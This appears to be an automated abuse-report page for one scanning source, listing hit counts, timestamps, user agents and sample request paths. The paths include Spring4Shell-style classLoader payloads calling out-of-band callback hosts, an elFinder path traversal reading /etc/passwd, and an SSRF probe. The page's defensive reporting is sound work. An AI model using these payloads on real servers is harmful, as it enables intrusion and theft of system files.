abuseip.org
- Reason
- suspicious paths across 6 domains
- Hits (last hour)
- 210
- Unique targets hit
- 12
- Unique paths probed
- 1,867
- Detection count
- 14
- First seen
- 2026-09-30 06:39:29 UTC
- Last seen
- 2026-09-30 06:57:11 UTC
- Block expires
- 2026-10-01 07:52:42 UTC
Sample paths probed
- /?class.module.classLoader.resources.context.configFile=http://dauatf3f52dc73fatn8gmmdmrs8ztgboz.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /?class.module.classLoader.resources.context.configFile=https://dauatf3f52dc73fatn8gj8qz6ecdpxks6.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /?class.module.classLoader.resources.context.configFile=https://dauatf3f52dc73fatn8gezxnfzwttwjdw.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js
- /?location=search
- /?class.module.classLoader.resources.context.configFile=http://dauatf3f52dc73fatn8g6n895qusbu441.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /wp-admin/admin-ajax.php
- /?class.module.classLoader.resources.context.configFile=https://dauatf3f52dc73fatn8g6puechqki5m61.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /login?redirect=%2F
- /
- /?class.module.classLoader.resources.context.configFile=http://dauatf3f52dc73fatn8g3m1rd4d7jq36r.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /?class.module.classLoader.resources.context.configFile=http://dauatf3f52dc73fatn8ga6oj3wc78zipb.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /?class.module.classLoader.resources.context.configFile=https://dauatf3f52dc73fatn8gsfmpjmpphj73p.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1
- /services/pluginscript/..;/..;/..;/getFavicon?host=dauatf3f52dc73fatn8ggz1pf6oa39wqr.oast.online
- /functionRouter
- /bitrix/admin/
- /?class.module.classLoader.resources.context.configFile=https://dauatf3f52dc73fatn8gs67t7xb1o3qpx.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /?class.module.classLoader.resources.context.configFile=http://dauatf3f52dc73fatn8gboq8o5xp6whwh.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- /cgi-bin/export-cgi?category=config&arg0=startup-config.conf
Sample User-Agents
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.6 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36 OPR/135.0.0.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:154.0) Gecko/20100101 Firefox/154.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.5.2 Safari/605.1.15
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.6.1 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36 OPR/134.0.0.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 YaBrowser/26.8.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.